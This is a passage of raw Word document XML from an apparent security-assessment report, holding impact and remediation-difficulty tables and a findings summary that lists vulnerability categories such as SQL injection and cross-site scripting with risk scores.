        <w:gridCol w:w="7638"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="56AE8E0A" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13B5FF13" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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Pr>
          <w:p w14:paraId="48072F4E" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="00412C87" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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6666"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="018BF326" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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0FBA04A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="67F5A919" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F55D670" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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7B1064A5" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may cause significant disruptions to non-critical business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF213FD" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="7DC5737A" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56651C44" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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65615AB" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may affect few users, without causing much disruption to routine business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F10ACE4" w14:textId="3A9DB1ED" w:rsidR="000C13F1" w:rsidRDefault="000C13F1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="640DF2FE" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc153834527"/>
      <w:r>
        <w:t>Remediation Difficulty Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>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1738"/>
        <w:gridCol w:w="7622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="5508F047" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="450"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="062FEA4C" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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Pr>
          <w:p w14:paraId="773C07EC" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="64A2660C" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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06666"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52F6C442" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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5FD40A77" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="32A24BB7" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="618"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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D966"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4531CD00" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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1FC99B9" w14:textId="52FC0AED" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="2F644823" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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3C47D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="173F687A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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66A845A" w14:textId="2A3C01D0" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation can be accomplished in a short amount of time, with little difficulty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73877584" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00B41A85" w:rsidP="00E56270">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_r2tozm8dlceh"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="_Toc153834528"/>
      <w:r w:rsidR="00E56270">
        <w:lastRenderedPageBreak/>
        <w:t>ASSESSMENT FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9622" w:type="dxa"/>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1078"/>
        <w:gridCol w:w="4854"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2250"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E56270" w14:paraId="1B5A5C5E"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66666"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EB44B8E" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Number</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66666"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55C35123" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Finding</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66666"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="410CA1A7" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Risk Score</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66666"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1CA259C3" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="62B115FF"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4964368" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:t>1</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3A4F500" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A57E388" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08C0ACC7" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="4D4D94DD" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="45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EA5D152" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</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5C1007" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Privilege Escalation (Webserver)</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38DFC332" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B50294E" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="17761258" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="465"/>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454C21F" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</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2A7DEF4" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Privilege Escalation (Client)</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D20F940" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</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0000"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2506F873" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="0D411669" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="465"/>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7AA8726" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="1D8F7EFF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</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40F73BA" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQL Injection</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6FD785E0" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</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3A37E460" w14:textId="0B197B93" w:rsidR="00E56270" w:rsidRDefault="00CF0EFB" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="3C9CAF50"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5058454" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:t>5</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FB23740" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cross Site Scripting</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42FE5696" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</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324C8525" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="701A273B"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1FE65DB" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</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7965B92" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Insecure Direct Object References</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5E43E826" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</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6E2DDA3C" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="7AABCFE3"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365FF0F4" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7</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9AB977C" w14:textId="77777777" w:rsidR="00E56270" w:rsidRPr="006C65CF" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C65CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Directory Listing</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66DF3787" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</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1C621AD3" w14:textId="77777777" w:rsidR="00E56270" w:rsidRDefault="00E56270" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E56270" w14:paraId="2BDA1C12"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C53435C" w14:textId="3194F127" w:rsidR="00E56270" w:rsidRDefault="00EC7A7A" w:rsidP="003B2C88">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
